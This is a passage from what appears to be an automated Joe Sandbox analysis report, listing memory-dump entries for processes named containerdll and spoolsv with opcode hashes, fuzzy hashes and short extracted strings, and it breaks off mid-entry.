              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d6f0d7fd6028b662c3495c58f8377aafa744a4b04ea89ee42ea0179afb4b7c27
              • Instruction ID: 96105aebb6549b1835acdae08aeb06ebf1deda2f95ce1cef42ebae5dc5499c65
              • Opcode Fuzzy Hash: d6f0d7fd6028b662c3495c58f8377aafa744a4b04ea89ee42ea0179afb4b7c27
              • Instruction Fuzzy Hash: A5016674918A4E8FEF94EF58C849AAA77E4FF68345F00056AA819C3191EB70E560CB81
              Memory Dump Source
              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4419cadfe5e78c60a04b8abfd16324ba685b78cc88df49cd2ec245cfd835cc59
              • Instruction ID: 4133968b90b385bf65f79218767baed1e5d7c4172f6123d9c683a00cfc3e94a0
              • Opcode Fuzzy Hash: 4419cadfe5e78c60a04b8abfd16324ba685b78cc88df49cd2ec245cfd835cc59
              • Instruction Fuzzy Hash: BB11FA70D0822A9FDB65DF14C8407A9B7F5BB54340F2481E6C00DA6291DF34AF85DF40
              Memory Dump Source
              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 15d8feff42f1c9093e4f22f411b5516105d847f12d32f1fea528f2b2b311d9d4
              • Instruction ID: 6c1773de4df031a049bb746555071ee6d070705278b5cc1f806c81fc3f4089e0
              • Opcode Fuzzy Hash: 15d8feff42f1c9093e4f22f411b5516105d847f12d32f1fea528f2b2b311d9d4
              • Instruction Fuzzy Hash: E5F06D3081E64E8FEB95EF6494152FA77A4FF15389F50457AF80DC22C1DB39A5A0CB88
              Memory Dump Source
              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f89ea5aa8f19f1f4b68d1e1ddcd84d4eff4208d31251f1f83d4cdc5938ca6ae
              • Instruction ID: 27cdfefb2d28d74907dbc0ab21325ccc7f9008d7d64202602453ef763a79e55b
              • Opcode Fuzzy Hash: 0f89ea5aa8f19f1f4b68d1e1ddcd84d4eff4208d31251f1f83d4cdc5938ca6ae
              • Instruction Fuzzy Hash: 8FF0623180E78A8FEB5AAF6488591A93BA1FF16341F4504BBD449C61D2EB38A454C741
              Memory Dump Source
              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9a4b2f341302756fc30373c0514700e89124b7ddb45dc2943cadc6c5ef701be8
              • Instruction ID: 0b5f1f72eaf8d83ea7d275feab1d6b1dd9922ab78ef9e82277cec02a12984657
              • Opcode Fuzzy Hash: 9a4b2f341302756fc30373c0514700e89124b7ddb45dc2943cadc6c5ef701be8
              • Instruction Fuzzy Hash: 2EF01D7092CA5E9EEB94FF6898592BA7AA0FF14241F00143BE85DC21D1EB745550CB44
              Memory Dump Source
              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b62ccf9c4f871bf7fe2cc773abe9dd085d2699aaffa4f1980ff1cb44f06c4a36
              • Instruction ID: f0820ddb5284fdc5636400120a64815b67ba084d91f70243d155675ebbc8f33e
              • Opcode Fuzzy Hash: b62ccf9c4f871bf7fe2cc773abe9dd085d2699aaffa4f1980ff1cb44f06c4a36
              • Instruction Fuzzy Hash: B0F0C4709199198EEB90EB28C456BE9B3B1FF58380F1082A6C40DD3196CB34AAC18B44
              Memory Dump Source
              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 61cce31bb2667419b5d1921769e8ab786650577a78c87082e71b08b9713db772
              • Instruction ID: d86d268bb364efa461746f0f5318981711dc1d1850601b1a1ed04b2018e9bea2
              • Opcode Fuzzy Hash: 61cce31bb2667419b5d1921769e8ab786650577a78c87082e71b08b9713db772
              • Instruction Fuzzy Hash: D9F05E30818A4E8EEB84EF6898082FE77E0FF18301F40093BE81DD2190EB3091608744
              Memory Dump Source
              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 25e647b769f549d33492ea3f74376b5a7eed0a0315be7732eb23ebd53a11eaea
              • Instruction ID: c329ae4e80c3759325399ba9f5f38cf91314f3fd784a932d0f242b3d9667f407
              • Opcode Fuzzy Hash: 25e647b769f549d33492ea3f74376b5a7eed0a0315be7732eb23ebd53a11eaea
              • Instruction Fuzzy Hash: DBF0BE7080E78E8FEB59AF6488292BD7BA0FF15306F4544BFE809C60D2EB39A454C741
              Memory Dump Source
              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8154425d4034458c72a240ae063365b99a535b0ec41015051dc3719e3c1a3021
              • Instruction ID: 1d6f6dd95edce902366b6aa13949a97629cf95ecaa2347e6faf6ed42cf7d12f9
              • Opcode Fuzzy Hash: 8154425d4034458c72a240ae063365b99a535b0ec41015051dc3719e3c1a3021
              • Instruction Fuzzy Hash: 4EF0173090E51A8FEB50FB14C894BEEB7B1EB94351F145276D409A32D5DF3869848B98
              Memory Dump Source
              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7e9ca4d7583cc8f705461048dc4beb42e52d049f8893f0e870aa8d78f3653465
              • Instruction ID: 46a0685406326526ae331d5ebdf5fcb8e67d32195525c46926d1c5cdc454e07b
              • Opcode Fuzzy Hash: 7e9ca4d7583cc8f705461048dc4beb42e52d049f8893f0e870aa8d78f3653465
              • Instruction Fuzzy Hash: D4F0F27090851A9FEB64FB04C9487AC73B0FF85341F1081BAC54EE62E0DF782A898B08
              Memory Dump Source
              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 74d34f91a8a65aac5e280c3d482d6d0172f1d3671abb8bfe1be90fd78044c73e
              • Instruction ID: b9926111989aec9ed255b17fb17167c858c3264122239fe0b86dfd18a0a8d4d9
              • Opcode Fuzzy Hash: 74d34f91a8a65aac5e280c3d482d6d0172f1d3671abb8bfe1be90fd78044c73e
              • Instruction Fuzzy Hash: 2BD0173180965E9FDF95EB5498951BE7BE0FF58344F00046AE81ED30D0EB34A5208744
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID: "$($M$N
              • API String ID: 0-2673639397
              • Opcode ID: e084ef111f2c671935d18f65df1e383bdc9d04318b3aa05fd6b1bffe52fdb0a1
              • Instruction ID: d115bf74d3b616e5bdcbda2dfd41237ad8b078f55dda52cdf483a3e8acc4a4e6
              • Opcode Fuzzy Hash: e084ef111f2c671935d18f65df1e383bdc9d04318b3aa05fd6b1bffe52fdb0a1
              • Instruction Fuzzy Hash: 9511F571E0822A8FDB65EF24D8843EEB6F1AF48340F4041EAD409A6290DB789A80CF44
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8566bbcf17bda5cd67a3070e5dcc44c468f2901c73311042750e075d689297d8
              • Instruction ID: a5c55f006f28302dae977f7161a4bdc2985cc876cc0a6faef5eccc0446055b4e
              • Opcode Fuzzy Hash: 8566bbcf17bda5cd67a3070e5dcc44c468f2901c73311042750e075d689297d8
              • Instruction Fuzzy Hash: 5291AD71E1CA4E8FE784EB2CD8157A9BFE1FB9A390F40017AC009D72C6DF6928058B55
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: *$-$/
              • API String ID: 0-145748381
              • Opcode ID: 4fbb5f2fd114bc9cc7bf086bac3230cb547e6251cda86ccaa280b40c37bf7849
              • Instruction ID: 4bcc27a425a74f2433eac8e96aec1a240b989288653c1852dde2aa068d9f8bc9
              • Opcode Fuzzy Hash: 4fbb5f2fd114bc9cc7bf086bac3230cb547e6251cda86ccaa280b40c37bf7849
              • Instruction Fuzzy Hash: 4321F075D0822A8FEB68EF54C8947EDB7B1FB54351F0041BAD04EA6281DB386A84DB00
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: NH$p\H
              • API String ID: 0-1232786254
              • Opcode ID: 4e5a75fe8362f3c9f99c2b16beb3f2a7fd7e0acb4a69473aae45004b25be0aab
              • Instruction ID: 54e4de906a619c1983df18a36e1cffcfc8de56a81ad04dc20646b4bfa8978ddc
              • Opcode Fuzzy Hash: 4e5a75fe8362f3c9f99c2b16beb3f2a7fd7e0acb4a69473aae45004b25be0aab
              • Instruction Fuzzy Hash: F4E12671D1965ADFEB98EB68D4957B8B7B1FF58340F1400BAD00EE3296CB386880CB55
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: 8mH
              • API String ID: 0-1362847371
              • Opcode ID: 3d2ed9a437279a892e2da8ac67187004930df2ec9c89e3fc689e2a092e49ffd4
              • Instruction ID: f8ea956280264889026010f07451fd27b4b1560dae16fecbbf690f7edcbaaf6b
              • Opcode Fuzzy Hash: 3d2ed9a437279a892e2da8ac67187004930df2ec9c89e3fc689e2a092e49ffd4
              • Instruction Fuzzy Hash: 29512A70D09A5D9FEB94EB68D8597ADBBF1FF68341F5000AAD00DE7296DB3468818B40
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: 8mH
              • API String ID: 0-1362847371
              • Opcode ID: b8ea157e700e0558e134320beec8a5d901d256053d47a52c7093f728302935f5
              • Instruction ID: 250a24ec06317f4c21b2d0b2f8b3e9bbd2be260b3e7765c99d81013f9a1c4fd7
              • Opcode Fuzzy Hash: b8ea157e700e0558e134320beec8a5d901d256053d47a52c7093f728302935f5
              • Instruction Fuzzy Hash: 19511A70D18A5D9FEB94EB68D859BADBBF1FF68740F00006AD00DE7292CF3469818B40
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: vH
              • API String ID: 0-2844672238
              • Opcode ID: 7494bf02d2e11e2dc5c81e8610cff549e812ab605684b48defd47b46dc43cf4d
              • Instruction ID: c4b60594b384e5f817d890ef2fc697dbe5794ca89f8f15574b9e3053f56e37d2
              • Opcode Fuzzy Hash: 7494bf02d2e11e2dc5c81e8610cff549e812ab605684b48defd47b46dc43cf4d
              • Instruction Fuzzy Hash: 75116A31D0954E9FEB80FB68D8492BE7BE0FF98381F4005B7D809C6192EF38A5448700
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: XyH
              • API String ID: 0-3434043539
              • Opcode ID: dc96c3a554331859027b3fff774ae50c8674008ff29f5a471bac1a3ee5d63a28
              • Instruction ID: 9d86d3d813759855050cb1b53734d10fff5f2b30a638e5731e3d8ee9a824e33a
              • Opcode Fuzzy Hash: dc96c3a554331859027b3fff774ae50c8674008ff29f5a471bac1a3ee5d63a28
              • Instruction Fuzzy Hash: 5E116D7090D68A8FEB99FB6488696B97BE0FF59341F0504BBE40AD60D2EF259484C714
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: XyH
              • API String ID: 0-3434043539
              • Opcode ID: f1c709b1ac90926a7d9f8cd31b77166f3b0cef5d8973a02752a3758e3359a63f
              • Instruction ID: 8878bf856c6102ff35e46026a1b48b00ccf0ec8554f7cf5235ba2541dca8ba5c
              • Opcode Fuzzy Hash: f1c709b1ac90926a7d9f8cd31b77166f3b0cef5d8973a02752a3758e3359a63f
              • Instruction Fuzzy Hash: A0F0AF30C1D69E8EEF99BB6888192FA77E4FF59341F00047BE41DD20D1EF245594C614
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cd914caf6a90205613aaf8b981e66f83d9d74e2ee239945c4d452a6d0ab5199f
              • Instruction ID: edd85d1c030b79bd68d1343da976ee8c177bb7b0689472eddb393dd8faad12f1
              • Opcode Fuzzy Hash: cd914caf6a90205613aaf8b981e66f83d9d74e2ee239945c4d452a6d0ab5199f
              • Instruction Fuzzy Hash: D511823190D68A9FE742A73888599AABBF0FF26740F0504F3D448D71E3EA28A554C725
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e478b8fbad6fef209f96a0b9a1fe959e744f2d082ff7070bda42baea8a5deab5
              • Instruction ID: 4fbedbff3d3a33e8371727dd60ba27ae217f9e5b763169d4455808f0080c0ecc
              • Opcode Fuzzy Hash: e478b8fbad6fef209f96a0b9a1fe959e744f2d082ff7070bda42baea8a5deab5
              • Instruction Fuzzy Hash: 68C1A570E19A2E8FDBA4EB58C855BEDB7B1FF68740F1041AAD00DE3291DB3469848F45
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d93b8c5798e85589d21b7003699c6f34f7cefb0563bc0cf9357b0a360f6612c2
              • Instruction ID: 9170a1002fc1ea991dfd2fe8b8ce2e10ca161ad058fb62f6734ea041c9fbc7b5
              • Opcode Fuzzy Hash: d93b8c5798e85589d21b7003699c6f34f7cefb0563bc0cf9357b0a360f6612c2
              • Instruction Fuzzy Hash: 10819C31A0CA4A8FDB58EB2888555B977E2FF99740F14457AE44EC32C6CF34AC82C785
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 592cd5fc5aa1e9dc8710723ec31b94ad7274bba47a1558cbf85690625bd9bae5
              • Instruction ID: a263081b2962b6569a454b9be89b1b21288b213504eeced62927c5eb5b4bdacb
              • Opcode Fuzzy Hash: 592cd5fc5aa1e9dc8710723ec31b94ad7274bba47a1558cbf85690625bd9bae5
              • Instruction Fuzzy Hash: A271D370D1861D8EEBA4EBA8C8557ECB6B1FF58341F5041BAD40DE3292DF386A84CB54
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 27c093864f13a85ef2845790eb859d7c2e41ca9fecc843cdd529a449826763e5
              • Instruction ID: a9843b0c3ffe2190da301f9f06f085ed65d49a85a506b91b47daf5f1cb1f8377
              • Opcode Fuzzy Hash: 27c093864f13a85ef2845790eb859d7c2e41ca9fecc843cdd529a449826763e5
              • Instruction Fuzzy Hash: 0151B131A0CA9A8FDB48EF1888545BA77E2FF98340F14457EE44AC7285CF34E842C785
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 940ba6743f434643d5eda26d65b005966163930f3544318ece41ad857ee31de2
              • Instruction ID: bb7826f792acc2fe4f0bf7b61f869b965426d4785bd71b4c7746e7fa7f91ea45
              • Opcode Fuzzy Hash: 940ba6743f434643d5eda26d65b005966163930f3544318ece41ad857ee31de2
              • Instruction Fuzzy Hash: 1651F570E1CA5D8EEB94FBA8C4556BDBBB1FF58340F50113AD409E7282DF34A8948B84
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 72e8e02992318d727ed395e70921f3cc2c549375b12b4f5e59cd13418d000106
              • Instruction ID: 9b5b124a2cc50e9b25434f8bd2c44e2a143acb9b1fd067f42b9df112c190c281
              • Opcode Fuzzy Hash: 72e8e02992318d727ed395e70921f3cc2c549375b12b4f5e59cd13418d000106
              • Instruction Fuzzy Hash: 4C510470D0951E8FEB54EBA8E8596EDBBB1EF49341F40017AD409E72D2DB38A944CB24
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5c458781dce71153f6da50fbe57c660f623978e4d902402bc284a0aa8dd71aad
              • Instruction ID: 1a6da3f892ba7ca4a880e876929c36b5ee81232f13b166d4c15dd98a1dfef19c
              • Opcode Fuzzy Hash: 5c458781dce71153f6da50fbe57c660f623978e4d902402bc284a0aa8dd71aad
              • Instruction Fuzzy Hash: 4B51DA71D085199FEBA8EB58C8597A9B7B1FF68741F1041BAC00EE32D1DF3869858F05
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b10185f4de886ff0c6d401402ec627656b2527bd3a946e05f28191220de37b10
              • Instruction ID: 5d5270ede837ffae500bcbd41e912c693a61041d99d8f0299c2bf2908a128e5b
              • Opcode Fuzzy Hash: b10185f4de886ff0c6d401402ec627656b2527bd3a946e05f28191220de37b10
              • Instruction Fuzzy Hash: B4414631E1DA8A0FE346F77898451B8BBE0EF4A381F0541BBD40DC71D2DF28A8418365
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8693215e0b389b8bac8ea071f1de4d650e432ce7925990845db1f01fb0d1ae00
              • Instruction ID: 7eccaa37dc1bea4642c9bdb31a7b86e70955bd30f6cec0be433047f976cd8e10
              • Opcode Fuzzy Hash: 8693215e0b389b8bac8ea071f1de4d650e432ce7925990845db1f01fb0d1ae00
              • Instruction Fuzzy Hash: 3441B23691E65A9FEB457BA8B8050FD7B60EF423B9F040237D908C90C3EF2C645182A9
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d785e56dd9d291fe42d22eb1c3284f3f603531058532ca4ed4febfdd5e1a9291
              • Instruction ID: e721a34c7c4c3c13453e6cb80dc35cc6f5f2511e0e4cddb235ce35a64edfb368
              • Opcode Fuzzy Hash: d785e56dd9d291fe42d22eb1c3284f3f603531058532ca4ed4febfdd5e1a9291
              • Instruction Fuzzy Hash: 2251F370D1952A8FEB64EB98C8557EDB7B0FF18340F1041BAD40DA3282EF782A858F44
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 319574726f18fc1c379f58c3fb48f90aa91567f595d3adad122dc6234f6d0213
              • Instruction ID: c1e7e8a949dd026b7d355a615272d70e4621a37b8fd946ee270ff9420ea2a8ed
              • Opcode Fuzzy Hash: 319574726f18fc1c379f58c3fb48f90aa91567f595d3adad122dc6234f6d0213
              • Instruction Fuzzy Hash: C2314A36A0D586AEE702FBBCA8554FA7BE0FF16361F1404B7C148DB0A3DB64A084C754
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 812030e7c06a1a4cba00c9244c8bf81a79ba9679b2039ce2e08bd7db64eaf6de
              • Instruction ID: dedb250e6d08933d2a41a06a80d565c2cc81c9783b032c35992d5330c4044d4f
              • Opcode Fuzzy Hash: 812030e7c06a1a4cba00c9244c8bf81a79ba9679b2039ce2e08bd7db64eaf6de
              • Instruction Fuzzy Hash: DD31E770E1C95D9EEB94FBA8D855ABCB7B2FF58340F50503AC40DE3282DF24A8819B44
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3d45863ada567296479eea560b6c67e7fc0d7f14dfef2e609f17b254a5714810
              • Instruction ID: 0bdb36254c563461d6efd6c0ab4da5d4d3e1dbb1cda82ea404ccd0854a078c24
              • Opcode Fuzzy Hash: 3d45863ada567296479eea560b6c67e7fc0d7f14dfef2e609f17b254a5714810
              • Instruction Fuzzy Hash: C1310870E1C95D8FEB94FBA88895ABCBBB1FF59340F50112AC40DE72C2DF2468519B44
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 46e8211392b9d282d49c1f08452eaea8ce97ac0a9b04e2e7afc94c04996ab2f7
              • Instruction ID: 2b17856c87fe5c7ac8ee5cfbc7ce826ad1dac44c175a2594e0596aae669f25d5
              • Opcode Fuzzy Hash: 46e8211392b9d282d49c1f08452eaea8ce97ac0a9b04e2e7afc94c04996ab2f7
              • Instruction Fuzzy Hash: 0221B171E0CD4A9FE785FB3998582B9BBE0FF55391F0844B7C019C60D2EF29A4868344
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ea545a63f9bc9884d1824929ff229c54142c2542fb34cc2abdd347f62022e4fa
              • Instruction ID: 49077f4ada0a596cdeeb34745f00ab47b10967d6d58ed48287a4c4ae430ea8fe
              • Opcode Fuzzy Hash: ea545a63f9bc9884d1824929ff229c54142c2542fb34cc2abdd347f62022e4fa
              • Instruction Fuzzy Hash: 1021D470D0891D8FEB94EB98D895AEDB7F1FF58341F10416AD00AE72E5CB38A944DB14
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7ab06f7ab47964042c369081794f66c9479579129b01ce77e3b871490b40ea1a
              • Instruction ID: 306275356e0a6aebf6a7e372af7b83ae66d50b5b9ab63aea9c6f6b296ea03b12
              • Opcode Fuzzy Hash: 7ab06f7ab47964042c369081794f66c9479579129b01ce77e3b871490b40ea1a
              • Instruction Fuzzy Hash: 1D21B13084D68A8FE742EB78885C5E97FF0EF5B301F0844EBD449CB1A2DA38954AC761
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cf504438ff0977ac2fa646fba062b6695710031e3f729b9feeb2a9022070ec4b
              • Instruction ID: 0434623e5d584cf20f3b58878a496606bb9e24ea9cdeade8f1352ebacd67fb46
